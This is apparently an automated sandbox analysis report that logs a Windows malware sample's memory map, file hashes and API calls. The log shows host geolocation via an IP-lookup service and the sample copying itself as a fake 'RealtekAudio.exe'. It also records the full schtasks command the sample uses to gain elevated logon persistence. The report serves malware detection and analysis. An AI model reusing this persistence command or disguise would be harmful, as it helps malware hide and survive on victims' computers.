rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory rw True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory rw True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 12 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe 213.50 KB MD5: 1e8073f6a1421490fc093196e4eb884e
SHA1: 25b6296a419e8471ec899b8e1996fb20c5845c22
SHA256: d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05
SSDeep: 6144:q+8ZepOGuDnw9tOJavXhe9Tedm/8b1tnzwa:qjZepgDj44Iyctnx
True
Threads
Thread 0xbf8
109 20
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
Mutex Create mutex_name = QSR_MUTEX_QSHCFbGIqN10lIdkUq True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 554 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.config, type = file_attributes False 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = CRH2YWU7 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = api.ipstack.com, address_out = 198.23.101.146, 158.85.167.221 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 198.23.101.146, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 204, size_out = 204 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = api.ipstack.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Inet Send HTTP Request headers = host: api.ipstack.com, connection: Keep-Alive, user-agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, url = api.ipstack.com/check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 966 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 966 True 1
Fn
Data
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe:Zone.Identifier False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek, type = file_attributes False 2
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Roaming\Realtek True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe, type = file_attributes False 1
Fn
File Copy source_filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, destination_filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe True 1
Fn
Process Create process_name = "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f, os_pid = 0xc88, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe:Zone.Identifier False 1
Fn
Process Create process_name = "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe", os_pid = 0xca0, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread 0xc08
17 6
»
Category Operation Information Success Count Logfile
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe True 1
Fn
Thread 0xc20
3 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 3
Fn
Thread 0xc28
52 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xc80
2 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #9: schtasks.exe
19 0
»
Information Value
ID #9
File Name c:\windows\system32\schtasks.exe
Command Line "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:40, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0xc88
Parent PID 0xbf4 (c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x C8C
0x C9C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory rw True False False -
locale.nls 0x00090000 0x000f6fff Memory Mapped File r False False False -
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory r True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory rw True False False -
pagefile_0x0000000000210000 0x00210000 0x002d7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory rw True False False -
schtasks.exe.mui 0x002f0000 0x00301fff Memory Mapped File rw False False False -
private_0x0000000000310000 0x00310000 0x00310fff Private Memory rw True False False -
private_0x0000000000320000 0x00320000 0x00320fff Private Memory rw True False False -
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory r True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory rw True False False -
pagefile_0x0000000000350000 0x00350000 0x00450fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x00460000 0x0072efff Memory Mapped File r False False False -
rpcss.dll 0x00730000 0x0078bfff Memory Mapped File r False False False -
private_0x0000000000730000 0x00730000 0x0090ffff Private Memory rw True False False -
pagefile_0x0000000000730000 0x00730000 0x0080efff Pagefile Backed Memory r True False False -
pagefile_0x0000000000810000 0x00810000 0x00810fff Pagefile Backed Memory r True False False -
private_0x00000000008d0000 0x008d0000 0x0090ffff Private Memory rw True False False -
private_0x0000000000a00000 0x00a00000 0x00a3ffff Private Memory rw True False False -
schtasks.exe 0x00f60000 0x00f8dfff Memory Mapped File rwx True False False -
pagefile_0x0000000000f90000 0x00f90000 0x01b8ffff Pagefile Backed Memory r True False False -
ktmw32.dll 0x734c0000 0x734c8fff Memory Mapped File rwx False False False -
taskschd.dll 0x739e0000 0x73a5cfff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xc8c
19 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:34 (UTC) True 1
Fn
System Get Time type = Ticks, time = 154924 True 1
Fn
Module Get Handle module_name = c:\windows\system32\schtasks.exe, base_address = 0xf60000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
Module Load module_name = VERSION.dll, base_address = 0x748d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoSizeW, address_out = 0x748d19d9 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoW, address_out = 0x748d19f4 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = VerQueryValueW, address_out = 0x748d1b51 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
